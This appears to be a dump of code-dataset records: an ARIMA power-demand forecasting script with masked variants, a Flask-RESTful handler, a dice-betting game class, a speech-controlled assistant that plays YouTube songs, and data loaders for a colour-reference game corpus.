from statsmodels.tsa.arima.model import ARIMA
from sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error
from math import sqrt
import tensorflow as tf
import pandas as pd
import numpy as np
import os
import random
# set random seed
random.seed(1)
np.random.seed(1)
tf.random.set_random_seed(1)
random_sample_save_folder_path = '../c_data_processing/b_data_sampling/sampled_data/'
for i in range(1, 6):
df = pd.read_csv( random_sample_save_folder_path + 'power_demand_sample%i.csv' %i, index_col=0)
regions = df.columns
result = pd.DataFrame(index=['rmse_test', 'r2_test', 'mae_test'])
predict = pd.DataFrame()
for region in regions:
RE_demand = pd.read_csv(random_sample_save_folder_path + 'power_demand_sample%i.csv' % i, index_col=0) # data initialization
RE_demand = RE_demand[region]
RE_demand = pd.DataFrame(RE_demand)
# train_test_split
train_test_split = int(len(RE_demand)*0.8)
train, test = RE_demand[:train_test_split], RE_demand[train_test_split:]
# data scaling
scaler = RobustScaler()
scaler = scaler.fit(RE_demand.values)
train_scaled = scaler.transform(train)
test_scaled = scaler.transform(test)
# model setting
history = [x for x in train_scaled]
test_pred = []
for j in range(len(test_scaled)):
model = ARIMA(history, order=(3,1,1)) # setting (p, d, q) guide : https://www.youtube.com/watch?v=YQF5PDDI9jo&list=LL&index=5
model_fit = model.fit()
output = model_fit.forecast()
yhat = output
test_pred.append(yhat)
            obs = test_scaled[j] # append the true observation for step j (walk-forward), not the outer sample index i
history.append(obs)
test_pred = np.array(test_pred)
test_pred = scaler.inverse_transform(test_pred)
        # model evaluation
rmse = sqrt(mean_squared_error(test, test_pred))
r2 = r2_score(test, test_pred)
mae = mean_absolute_error(test, test_pred)
metrics = [rmse, r2, mae]
result['%s' %region] = metrics
performance_path = './ARIMA/performance/'
# data forecasting
forecast = model_fit.forecast(steps=24)
forecast = forecast.reshape(-1,1)
forecast = scaler.inverse_transform(forecast)
# data concatenate
test = np.array(['test']).reshape(-1, 1)
pred = np.array(['forecast']).reshape(-1, 1)
forecast = np.concatenate([test, test_pred, pred, forecast])
forecast = np.concatenate(forecast)
predict['%s' % region] = forecast
forecast_path = './ARIMA/forecast/'
if not os.path.exists(performance_path):
os.makedirs(performance_path)
result.to_csv(performance_path + 'ARIMA_sample%s_score.csv' % i)
if not os.path.exists(forecast_path):
os.makedirs(forecast_path)
predict.to_csv(forecast_path + 'ARIMA_sample%s_forecast.csv' % i)
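
# Optional sanity check (a sketch, assuming the loop above has already written its CSVs):
# reload one saved forecast to confirm the layout; the 'test'/'forecast' marker rows
# separate the walk-forward back-test from the 24-step-ahead forecast.
# check = pd.read_csv('./ARIMA/forecast/ARIMA_sample1_forecast.csv', index_col=0)
# print(check.head())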
|
normal
|
{
"blob_id": "d78ac5188cad104ee1b3e214898c41f843b6d8c0",
"index": 5185,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nrandom.seed(1)\nnp.random.seed(1)\ntf.random.set_random_seed(1)\n<mask token>\nfor i in range(1, 6):\n df = pd.read_csv(random_sample_save_folder_path + \n 'power_demand_sample%i.csv' % i, index_col=0)\n regions = df.columns\n result = pd.DataFrame(index=['rmse_test', 'r2_test', 'mae_test'])\n predict = pd.DataFrame()\n for region in regions:\n RE_demand = pd.read_csv(random_sample_save_folder_path + \n 'power_demand_sample%i.csv' % i, index_col=0)\n RE_demand = RE_demand[region]\n RE_demand = pd.DataFrame(RE_demand)\n train_test_split = int(len(RE_demand) * 0.8)\n train, test = RE_demand[:train_test_split], RE_demand[train_test_split:\n ]\n scaler = RobustScaler()\n scaler = scaler.fit(RE_demand.values)\n train_scaled = scaler.transform(train)\n test_scaled = scaler.transform(test)\n history = [x for x in train_scaled]\n test_pred = []\n for j in range(len(test_scaled)):\n model = ARIMA(history, order=(3, 1, 1))\n model_fit = model.fit()\n output = model_fit.forecast()\n yhat = output\n test_pred.append(yhat)\n obs = test_scaled[i]\n history.append(obs)\n test_pred = np.array(test_pred)\n test_pred = scaler.inverse_transform(test_pred)\n rmse = sqrt(mean_squared_error(test, test_pred))\n r2 = r2_score(test, test_pred)\n mae = mean_absolute_error(test, test_pred)\n metrics = [rmse, r2, mae]\n result['%s' % region] = metrics\n performance_path = './ARIMA/performance/'\n forecast = model_fit.forecast(steps=24)\n forecast = forecast.reshape(-1, 1)\n forecast = scaler.inverse_transform(forecast)\n test = np.array(['test']).reshape(-1, 1)\n pred = np.array(['forecast']).reshape(-1, 1)\n forecast = np.concatenate([test, test_pred, pred, forecast])\n forecast = np.concatenate(forecast)\n predict['%s' % region] = forecast\n forecast_path = './ARIMA/forecast/'\n if not os.path.exists(performance_path):\n os.makedirs(performance_path)\n result.to_csv(performance_path + 'ARIMA_sample%s_score.csv' % i)\n if not os.path.exists(forecast_path):\n os.makedirs(forecast_path)\n predict.to_csv(forecast_path + 'ARIMA_sample%s_forecast.csv' % i)\n",
"step-3": "<mask token>\nrandom.seed(1)\nnp.random.seed(1)\ntf.random.set_random_seed(1)\nrandom_sample_save_folder_path = (\n '../c_data_processing/b_data_sampling/sampled_data/')\nfor i in range(1, 6):\n df = pd.read_csv(random_sample_save_folder_path + \n 'power_demand_sample%i.csv' % i, index_col=0)\n regions = df.columns\n result = pd.DataFrame(index=['rmse_test', 'r2_test', 'mae_test'])\n predict = pd.DataFrame()\n for region in regions:\n RE_demand = pd.read_csv(random_sample_save_folder_path + \n 'power_demand_sample%i.csv' % i, index_col=0)\n RE_demand = RE_demand[region]\n RE_demand = pd.DataFrame(RE_demand)\n train_test_split = int(len(RE_demand) * 0.8)\n train, test = RE_demand[:train_test_split], RE_demand[train_test_split:\n ]\n scaler = RobustScaler()\n scaler = scaler.fit(RE_demand.values)\n train_scaled = scaler.transform(train)\n test_scaled = scaler.transform(test)\n history = [x for x in train_scaled]\n test_pred = []\n for j in range(len(test_scaled)):\n model = ARIMA(history, order=(3, 1, 1))\n model_fit = model.fit()\n output = model_fit.forecast()\n yhat = output\n test_pred.append(yhat)\n obs = test_scaled[i]\n history.append(obs)\n test_pred = np.array(test_pred)\n test_pred = scaler.inverse_transform(test_pred)\n rmse = sqrt(mean_squared_error(test, test_pred))\n r2 = r2_score(test, test_pred)\n mae = mean_absolute_error(test, test_pred)\n metrics = [rmse, r2, mae]\n result['%s' % region] = metrics\n performance_path = './ARIMA/performance/'\n forecast = model_fit.forecast(steps=24)\n forecast = forecast.reshape(-1, 1)\n forecast = scaler.inverse_transform(forecast)\n test = np.array(['test']).reshape(-1, 1)\n pred = np.array(['forecast']).reshape(-1, 1)\n forecast = np.concatenate([test, test_pred, pred, forecast])\n forecast = np.concatenate(forecast)\n predict['%s' % region] = forecast\n forecast_path = './ARIMA/forecast/'\n if not os.path.exists(performance_path):\n os.makedirs(performance_path)\n result.to_csv(performance_path + 'ARIMA_sample%s_score.csv' % i)\n if not os.path.exists(forecast_path):\n os.makedirs(forecast_path)\n predict.to_csv(forecast_path + 'ARIMA_sample%s_forecast.csv' % i)\n",
"step-4": "from sklearn.preprocessing import RobustScaler\nfrom statsmodels.tsa.arima.model import ARIMA\nfrom sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error\nfrom math import sqrt\nimport tensorflow as tf\nimport pandas as pd\nimport numpy as np\nimport os\nimport random\nrandom.seed(1)\nnp.random.seed(1)\ntf.random.set_random_seed(1)\nrandom_sample_save_folder_path = (\n '../c_data_processing/b_data_sampling/sampled_data/')\nfor i in range(1, 6):\n df = pd.read_csv(random_sample_save_folder_path + \n 'power_demand_sample%i.csv' % i, index_col=0)\n regions = df.columns\n result = pd.DataFrame(index=['rmse_test', 'r2_test', 'mae_test'])\n predict = pd.DataFrame()\n for region in regions:\n RE_demand = pd.read_csv(random_sample_save_folder_path + \n 'power_demand_sample%i.csv' % i, index_col=0)\n RE_demand = RE_demand[region]\n RE_demand = pd.DataFrame(RE_demand)\n train_test_split = int(len(RE_demand) * 0.8)\n train, test = RE_demand[:train_test_split], RE_demand[train_test_split:\n ]\n scaler = RobustScaler()\n scaler = scaler.fit(RE_demand.values)\n train_scaled = scaler.transform(train)\n test_scaled = scaler.transform(test)\n history = [x for x in train_scaled]\n test_pred = []\n for j in range(len(test_scaled)):\n model = ARIMA(history, order=(3, 1, 1))\n model_fit = model.fit()\n output = model_fit.forecast()\n yhat = output\n test_pred.append(yhat)\n obs = test_scaled[i]\n history.append(obs)\n test_pred = np.array(test_pred)\n test_pred = scaler.inverse_transform(test_pred)\n rmse = sqrt(mean_squared_error(test, test_pred))\n r2 = r2_score(test, test_pred)\n mae = mean_absolute_error(test, test_pred)\n metrics = [rmse, r2, mae]\n result['%s' % region] = metrics\n performance_path = './ARIMA/performance/'\n forecast = model_fit.forecast(steps=24)\n forecast = forecast.reshape(-1, 1)\n forecast = scaler.inverse_transform(forecast)\n test = np.array(['test']).reshape(-1, 1)\n pred = np.array(['forecast']).reshape(-1, 1)\n forecast = np.concatenate([test, test_pred, pred, forecast])\n forecast = np.concatenate(forecast)\n predict['%s' % region] = forecast\n forecast_path = './ARIMA/forecast/'\n if not os.path.exists(performance_path):\n os.makedirs(performance_path)\n result.to_csv(performance_path + 'ARIMA_sample%s_score.csv' % i)\n if not os.path.exists(forecast_path):\n os.makedirs(forecast_path)\n predict.to_csv(forecast_path + 'ARIMA_sample%s_forecast.csv' % i)\n",
"step-5": "from sklearn.preprocessing import RobustScaler\nfrom statsmodels.tsa.arima.model import ARIMA\nfrom sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error\nfrom math import sqrt\n\nimport tensorflow as tf\nimport pandas as pd\nimport numpy as np\nimport os\nimport random\n\n# set random seed\nrandom.seed(1)\nnp.random.seed(1)\ntf.random.set_random_seed(1)\n\nrandom_sample_save_folder_path = '../c_data_processing/b_data_sampling/sampled_data/'\nfor i in range(1, 6):\n df = pd.read_csv( random_sample_save_folder_path + 'power_demand_sample%i.csv' %i, index_col=0)\n regions = df.columns\n\n result = pd.DataFrame(index=['rmse_test', 'r2_test', 'mae_test'])\n predict = pd.DataFrame()\n\n for region in regions:\n RE_demand = pd.read_csv(random_sample_save_folder_path + 'power_demand_sample%i.csv' % i, index_col=0) # data initialization\n RE_demand = RE_demand[region]\n RE_demand = pd.DataFrame(RE_demand)\n\n\n # train_test_split\n train_test_split = int(len(RE_demand)*0.8)\n train, test = RE_demand[:train_test_split], RE_demand[train_test_split:]\n\n # data scaling\n scaler = RobustScaler()\n scaler = scaler.fit(RE_demand.values)\n\n train_scaled = scaler.transform(train)\n test_scaled = scaler.transform(test)\n\n\n # model setting\n history = [x for x in train_scaled]\n\n test_pred = []\n\n for j in range(len(test_scaled)):\n model = ARIMA(history, order=(3,1,1)) # setting (p, d, q) guide : https://www.youtube.com/watch?v=YQF5PDDI9jo&list=LL&index=5\n model_fit = model.fit()\n output = model_fit.forecast()\n yhat = output\n test_pred.append(yhat)\n obs = test_scaled[i]\n history.append(obs)\n test_pred = np.array(test_pred)\n test_pred = scaler.inverse_transform(test_pred)\n\n # model evalutaion\n rmse = sqrt(mean_squared_error(test, test_pred))\n r2 = r2_score(test, test_pred)\n mae = mean_absolute_error(test, test_pred)\n\n metrics = [rmse, r2, mae]\n result['%s' %region] = metrics\n performance_path = './ARIMA/performance/'\n\n\n # data forecasting\n forecast = model_fit.forecast(steps=24)\n forecast = forecast.reshape(-1,1)\n forecast = scaler.inverse_transform(forecast)\n\n\n # data concatenate\n test = np.array(['test']).reshape(-1, 1)\n pred = np.array(['forecast']).reshape(-1, 1)\n\n forecast = np.concatenate([test, test_pred, pred, forecast])\n forecast = np.concatenate(forecast)\n predict['%s' % region] = forecast\n\n forecast_path = './ARIMA/forecast/'\n\n\n if not os.path.exists(performance_path):\n os.makedirs(performance_path)\n result.to_csv(performance_path + 'ARIMA_sample%s_score.csv' % i)\n\n if not os.path.exists(forecast_path):\n os.makedirs(forecast_path)\n predict.to_csv(forecast_path + 'ARIMA_sample%s_forecast.csv' % i)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from flask_restful import Api, Resource, reqparse
class HelloApiHandler(Resource):
def get(self):
return {
'resultStatus': 'SUCCESS',
'message': "Hello Api Handler"
}
def post(self):
print(self)
parser = reqparse.RequestParser()
parser.add_argument('type', type=str)
parser.add_argument('message', type=str)
args = parser.parse_args()
print(args)
        # note: the POST request from the frontend needs to match the argument names here (e.g. 'type' and 'message')
request_type = args['type']
request_json = args['message']
# ret_status, ret_msg = ReturnData(request_type, request_json)
# currently just returning the req straight
ret_status = request_type
ret_msg = request_json
if ret_msg:
message = "Your Message Requested: {}".format(ret_msg)
else:
message = "No Msg"
final_ret = {"status": "Success", "message": message}
return final_ret
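

# Registration sketch (hedged: the Flask app module is assumed, not shown here;
# flask_restful resources are typically wired up like this in the entry point):
# from flask import Flask
# app = Flask(__name__)
# api = Api(app)
# api.add_resource(HelloApiHandler, '/flask/hello')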
|
normal
|
{
"blob_id": "80c3d9165c1b592122fabf6382e265465604989c",
"index": 1450,
"step-1": "<mask token>\n\n\nclass HelloApiHandler(Resource):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass HelloApiHandler(Resource):\n\n def get(self):\n return {'resultStatus': 'SUCCESS', 'message': 'Hello Api Handler'}\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass HelloApiHandler(Resource):\n\n def get(self):\n return {'resultStatus': 'SUCCESS', 'message': 'Hello Api Handler'}\n\n def post(self):\n print(self)\n parser = reqparse.RequestParser()\n parser.add_argument('type', type=str)\n parser.add_argument('message', type=str)\n args = parser.parse_args()\n print(args)\n request_type = args['type']\n request_json = args['message']\n ret_status = request_type\n ret_msg = request_json\n if ret_msg:\n message = 'Your Message Requested: {}'.format(ret_msg)\n else:\n message = 'No Msg'\n final_ret = {'status': 'Success', 'message': message}\n return final_ret\n",
"step-4": "from flask_restful import Api, Resource, reqparse\n\n\nclass HelloApiHandler(Resource):\n\n def get(self):\n return {'resultStatus': 'SUCCESS', 'message': 'Hello Api Handler'}\n\n def post(self):\n print(self)\n parser = reqparse.RequestParser()\n parser.add_argument('type', type=str)\n parser.add_argument('message', type=str)\n args = parser.parse_args()\n print(args)\n request_type = args['type']\n request_json = args['message']\n ret_status = request_type\n ret_msg = request_json\n if ret_msg:\n message = 'Your Message Requested: {}'.format(ret_msg)\n else:\n message = 'No Msg'\n final_ret = {'status': 'Success', 'message': message}\n return final_ret\n",
"step-5": "from flask_restful import Api, Resource, reqparse\n\nclass HelloApiHandler(Resource):\n def get(self):\n return {\n 'resultStatus': 'SUCCESS',\n 'message': \"Hello Api Handler\"\n }\n\n def post(self):\n print(self)\n parser = reqparse.RequestParser()\n parser.add_argument('type', type=str)\n parser.add_argument('message', type=str)\n\n args = parser.parse_args()\n\n print(args)\n # note, the post req from frontend needs to match the strings here (e.g. 'type and 'message')\n\n request_type = args['type']\n request_json = args['message']\n # ret_status, ret_msg = ReturnData(request_type, request_json)\n # currently just returning the req straight\n ret_status = request_type\n ret_msg = request_json\n\n if ret_msg:\n message = \"Your Message Requested: {}\".format(ret_msg)\n else:\n message = \"No Msg\"\n \n final_ret = {\"status\": \"Success\", \"message\": message}\n\n return final_ret",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from game import BaseGame
class First(BaseGame):
key = 'F'
code = 'FIRST'
short_description = 'Vinci se esce 1 o 2. x2.8'
long_description = (
'Si lancia un unico dado, se esce 1 o 2 vinci 2.8 volte quello che hai'
' puntato.')
min_bet = 20
multiplier = 2.8
def has_won(self, draws):
return draws[0] in (1, 2)
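

# Usage sketch (hedged: BaseGame's constructor and draw handling live elsewhere in
# this project, so only the win check is exercised here):
# game = First()
# print(game.has_won([1]))  # True
# print(game.has_won([5]))  # False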
|
normal
|
{
"blob_id": "81fa3129d971fe8296a89a7b772d61ff50a8b9f7",
"index": 9284,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass First(BaseGame):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def has_won(self, draws):\n return draws[0] in (1, 2)\n",
"step-3": "<mask token>\n\n\nclass First(BaseGame):\n key = 'F'\n code = 'FIRST'\n short_description = 'Vinci se esce 1 o 2. x2.8'\n long_description = (\n 'Si lancia un unico dado, se esce 1 o 2 vinci 2.8 volte quello che hai puntato.'\n )\n min_bet = 20\n multiplier = 2.8\n\n def has_won(self, draws):\n return draws[0] in (1, 2)\n",
"step-4": "from game import BaseGame\n\n\nclass First(BaseGame):\n key = 'F'\n code = 'FIRST'\n short_description = 'Vinci se esce 1 o 2. x2.8'\n long_description = (\n 'Si lancia un unico dado, se esce 1 o 2 vinci 2.8 volte quello che hai puntato.'\n )\n min_bet = 20\n multiplier = 2.8\n\n def has_won(self, draws):\n return draws[0] in (1, 2)\n",
"step-5": "from game import BaseGame\n\n\nclass First(BaseGame):\n key = 'F'\n code = 'FIRST'\n short_description = 'Vinci se esce 1 o 2. x2.8'\n long_description = (\n 'Si lancia un unico dado, se esce 1 o 2 vinci 2.8 volte quello che hai'\n ' puntato.')\n min_bet = 20\n multiplier = 2.8\n\n def has_won(self, draws):\n return draws[0] in (1, 2)\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
import speech_recognition as sr
import pyttsx3
import pywhatkit
import datetime
listner = sr.Recognizer()
engine = pyttsx3.init()
#change voices
voices = engine.getProperty('voices')
engine.setProperty('voice',voices[10].id)
rate = engine.getProperty('rate')
engine.setProperty('rate', 150)
# text-to-speech helper: speak the given text aloud
def talk(text):
engine.say(text)
engine.runAndWait()
def takeCommand():
    cmd = ""  # default value so a string is still returned if recognition fails
    try:
with sr.Microphone() as sc:
print("Listening......")
vc = listner.listen(sc)
cmd = listner.recognize_google(vc)
cmd = cmd.lower()
if 'alexa' in cmd:
cmd = cmd.replace('alexa','')
except:
pass
return cmd
def run_alexa():
command = takeCommand()
print(command)
if 'play' in command:
song = command.replace('play','')
talk('playing '+song)
pywhatkit.playonyt(song)
if 'time' in command:
time = datetime.datetime.now().strftime('%I:%M %p')
talk('time is '+time)
print(time)
run_alexa()
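
# To keep the assistant listening continuously (optional sketch; would replace the single call above):
# while True:
#     run_alexa()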
|
normal
|
{
"blob_id": "c4f437e6f5aaeccb6dd0948c3ed1f1d465bb29ce",
"index": 1200,
"step-1": "<mask token>\n\n\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print('Listening......')\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa', '')\n except:\n pass\n return cmd\n\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play', '')\n talk('playing ' + song)\n pywhatkit.playonyt(song)\n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is ' + time)\n print(time)\n\n\n<mask token>\n",
"step-2": "<mask token>\nengine.setProperty('voice', voices[10].id)\n<mask token>\nengine.setProperty('rate', 150)\n\n\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print('Listening......')\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa', '')\n except:\n pass\n return cmd\n\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play', '')\n talk('playing ' + song)\n pywhatkit.playonyt(song)\n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is ' + time)\n print(time)\n\n\nrun_alexa()\n",
"step-3": "<mask token>\nlistner = sr.Recognizer()\nengine = pyttsx3.init()\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[10].id)\nrate = engine.getProperty('rate')\nengine.setProperty('rate', 150)\n\n\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print('Listening......')\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa', '')\n except:\n pass\n return cmd\n\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play', '')\n talk('playing ' + song)\n pywhatkit.playonyt(song)\n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is ' + time)\n print(time)\n\n\nrun_alexa()\n",
"step-4": "import speech_recognition as sr\nimport pyttsx3\nimport pywhatkit\nimport datetime\nlistner = sr.Recognizer()\nengine = pyttsx3.init()\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[10].id)\nrate = engine.getProperty('rate')\nengine.setProperty('rate', 150)\n\n\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print('Listening......')\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa', '')\n except:\n pass\n return cmd\n\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play', '')\n talk('playing ' + song)\n pywhatkit.playonyt(song)\n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is ' + time)\n print(time)\n\n\nrun_alexa()\n",
"step-5": "import speech_recognition as sr\nimport pyttsx3\nimport pywhatkit\nimport datetime\n\n\nlistner = sr.Recognizer()\nengine = pyttsx3.init()\n\n#change voices\nvoices = engine.getProperty('voices')\nengine.setProperty('voice',voices[10].id)\nrate = engine.getProperty('rate')\nengine.setProperty('rate', 150)\n\n#for machine to say\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\ndef takeCommand():\n try:\n with sr.Microphone() as sc:\n print(\"Listening......\")\n vc = listner.listen(sc)\n cmd = listner.recognize_google(vc)\n cmd = cmd.lower()\n if 'alexa' in cmd:\n cmd = cmd.replace('alexa','')\n except:\n pass\n return cmd\n\ndef run_alexa():\n command = takeCommand()\n print(command)\n if 'play' in command:\n song = command.replace('play','')\n talk('playing '+song)\n pywhatkit.playonyt(song)\n \n if 'time' in command:\n time = datetime.datetime.now().strftime('%I:%M %p')\n talk('time is '+time)\n print(time)\n\nrun_alexa()",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from collections import Counter
import pandas as pd
import string
from collections import namedtuple, defaultdict
import csv
import sys
import torch
import numpy as np
from sklearn.preprocessing import LabelEncoder
from scipy.sparse import coo_matrix
from tqdm import tqdm
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
device = 'cpu'
def get_data():
df = pd.read_csv("./data/filteredCorpus.csv")
df_filt = df[df['outcome']==True] # use only successful games
df_filt = df_filt[df_filt['role']=='speaker'] # use speaker utterances
    df_filt = df_filt[df_filt['source']=='human'] # use human-generated utterances
# making a list of utterances that we want to use, so we can take these rows from df_filt
utt = df_filt['contents']
utt_filt = [u.lower() for u in utt if len(u.split()) == 1] # only use one word utterances
utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for u in utt_filt] # remove punctuation
utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys()) # use utterances that appear more than once
# df_filt = df_filt[df_filt['numCleanWords'] == 1]
df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())
df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(str.maketrans('', '', string.punctuation)))# filter to take out punctuation
df_final = df.loc[df['contents'].isin(utt_final)] # this is the dataset of all the games that we want to use
le = LabelEncoder()
df_final['contents'] = le.fit_transform(df_final['contents'])
return df_final, le
def get_meaning_matrix(df):
df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))
df['colors'] = df['colors'].apply(lambda x: str(x))
colors_le = LabelEncoder()
df['colors'] = colors_le.fit_transform(df['colors']) # 100 x 100 (test data)
print("length colors and contents", len(df['colors']), len(df['contents']))
print("set colors and contents", len(set(df['colors'])), len(set(df['contents'])))
meaning_mat = pd.crosstab(df['colors'], df['contents']) # rows are colors, columns are utterances
# row numbers and column numbers correspond to labels from colors_le and le (utterances) from get_data()
meaning_mat = np.array(meaning_mat) # a num_color x num_utterances matrix
for i in range(len(meaning_mat[:,0])):
if sum(meaning_mat[i,:]) == 0:
print("meaning mat is 0 for this row: ", i)
for j in range(len(meaning_mat[0,:])):
if meaning_mat[i,j] == 0:
print("meaning mat is 0 at: ", i,j," !!!")
return meaning_mat, colors_le
# Pragmatic listener (testing) data function
def get_pragmatic_listener_testing_data(df):
output = []
all_utt = list(set(list(df['contents'])))
desc_to_idx = {u: i for i,u in enumerate(all_utt)}
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents']).to(device)
correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32)
alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']], dtype=torch.float32)
alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']], dtype=torch.float32)
colors = (correct, alt1, alt2)
# idxs = random.choice([0,1,2]) # randomly permute colors
idxs = np.arange(3)
np.random.shuffle(idxs)
colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]], colors[idxs[2]]]).to(device)
correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device) # index where correct color goes
output.append((correct_idx, colors_shuff, utt))
return output, all_utt, desc_to_idx # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc
# return all_utt, idx_to_desc # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc
def get_literal_listener_training_data(df):
output = []
all_utt = df['contents']
idx_to_desc = {i: u for i,u in enumerate(all_utt)}
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents']).to(device)
correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32)
alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']], dtype=torch.float32)
alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']], dtype=torch.float32)
colors = (correct, alt1, alt2)
# idxs = random.choice([0,1,2]) # randomly permute colors
idxs = np.arange(3)
np.random.shuffle(idxs)
colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]], colors[idxs[2]]]).to(device)
correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device) # index where correct color goes
output.append((correct_idx, colors_shuff, utt))
return output#, all_utt, idx_to_desc # [correct_referent_idx, list_of_three_referents, descriptor_idx] desc_to_idx idx_to_desc
# Literal speaker data function
def get_literal_speaker_training_data(df):
output = []
for _, row in tqdm(df.iterrows(), total=len(df)):
utt = torch.tensor(row['contents'], dtype=torch.long).to(device)
color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']], dtype=torch.float32).to(device)
output.append([color, utt])
return output # [referent, utterance_idx]
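

# Pipeline sketch (assumes ./data/filteredCorpus.csv is available locally):
# df, le = get_data()
# meaning_mat, colors_le = get_meaning_matrix(df)
# listener_data = get_literal_listener_training_data(df)
# speaker_data = get_literal_speaker_training_data(df)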
|
normal
|
{
"blob_id": "613b060ee50b49417342cfa70b36f77d112dcc58",
"index": 2951,
"step-1": "<mask token>\n\n\ndef get_data():\n df = pd.read_csv('./data/filteredCorpus.csv')\n df_filt = df[df['outcome'] == True]\n df_filt = df_filt[df_filt['role'] == 'speaker']\n df_filt = df_filt[df_filt['source'] == 'human']\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1]\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for\n u in utt_filt]\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(\n str.maketrans('', '', string.punctuation)))\n df_final = df.loc[df['contents'].isin(utt_final)]\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n return df_final, le\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors'])\n print('length colors and contents', len(df['colors']), len(df['contents']))\n print('set colors and contents', len(set(df['colors'])), len(set(df[\n 'contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents'])\n meaning_mat = np.array(meaning_mat)\n for i in range(len(meaning_mat[:, 0])):\n if sum(meaning_mat[i, :]) == 0:\n print('meaning mat is 0 for this row: ', i)\n for j in range(len(meaning_mat[0, :])):\n if meaning_mat[i, j] == 0:\n print('meaning mat is 0 at: ', i, j, ' !!!')\n return meaning_mat, colors_le\n\n\n<mask token>\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return 